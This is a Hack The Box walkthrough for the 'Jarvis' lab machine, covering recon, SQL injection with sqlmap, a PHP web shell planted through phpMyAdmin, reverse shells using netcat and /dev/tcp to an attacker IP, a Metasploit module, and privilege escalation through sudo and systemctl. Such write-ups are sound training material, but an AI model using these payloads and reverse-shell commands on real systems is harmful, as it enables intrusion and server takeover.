Recon :
As every box in hackthebox we will start by port scanning the target using nmap
Now let’s start our initial enumerations by doing a full ports scan and checking all the available services with :
Nmap -sC -sV -p- jarvis.htb -oA nmap/jarvis-full-ports
sC : runs nmap with default scripts
sV : runs nmap with version checking-
oA : output result of nmap in all formats
Now lets go check both ports 80 and 64999 running with Apache
We also have to check port 64999
Directories brute forcing :
We will check for pages and directory within the apache server on port 80
Command : gobuster dir -u http://jarvis.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o dir-listing.txt
- w option is for setting the wordlist to bruteforce with in this case we used a very common wordlist
- -o option is to store the result in a file in our case it is dir-listing.txt
As you can see we found an interesting page for phpmyadmin lets check it!
It is obvious that now we need the right credentials to login to the database.
SQL Injection :
It is a booking website now let’s take a room for our self and see what happens
As you can see the php code with a get method cod=5 we will do a simple change on it and check if it is vulnerable to sql injection by making our request like this http://supersecurehotel.htb/room.php?cod=’
As you can see the picture of the room does not appear any more so we have a possible sql injection there.
Now we need to check with sqlmap :
Command : sqlmap — url http://10.10.10.143/room.php?cod=1 — passwords — dump-all — batch
Username : DBadmin
Password : imissyou
And there we go we have cracked the username and the password for the database we will try those credentials to login to phpmyadmin
We got in :D
Our goal now is to get access to the server by having a reverse shell we will use 2 methods for that matter.
1st method :
We will follow the steps in this article :
We need to do some sql queries to create our own php reverse shell
Our query will be like this :
SELECT “<?php system($_GET[‘comand’]); ?>” into outfile “/var/www/html/hack3r.php”
We just need to go to query section and execute that command
And there we go check if the filehas been created and test our rce script :
Now we are sure that we have command execution over the server the only thing left is our reverse shell.
We will set out netcat listener on port 443
And then run this comand on the hack3r.php script that we have created.
jarvis.htb/hack3r.php?comand=nc -e /bin/bash 10.10.14.36 443
And we got our reverse shell :D
2nd Method :
We will use a vulnerability in phpmyadmin that leads to RCE with msfconsole
-msf5 > use exploit/multi/http/phpmyadmin_lfi_rce
-Set rhosts 10.10.10.143
-Set username DBadmin
-Set password imissyou
-Run
Privilege Escalation :
We will run sudo -l to check for a possible way to run sudo command as www-data we found this result :
We may run the sudo command with the user ‘pepper’ with that python script
Let us try and see what we get :
Let’s try to get a shell as pepper user by trying this $(“/bin/bash”)
After logging in as pepper we found out that we are in a restricted bash we need to have an interactive shell for that matter we used this command :
Command : sh -i >& /dev/tcp/10.10.14.36/1234 0>&1
And we got the user flag :D
We will check for SUID binaries
We found out that user pepper can run /bin/systemctl as the root user for that matter we will focus there
We will follow this article to exploit systemctl command :
First thing we need to create a service of our own and make our reverse shell there and then we need to symlink it using the full path so that we can run that service.
And we owned root !
Hope you guys enjoyed our writeup :)
That’s it , Feedback is appreciated !
Don’t forget to follow on twitter @Taodaiv2
writers : jassem melki & amine fguiri
HTB LINKS:
https://www.hackthebox.eu/profile/151296 https://www.hackthebox.eu/profile/92694
Every respect is apperciated :)
Thanks for reading.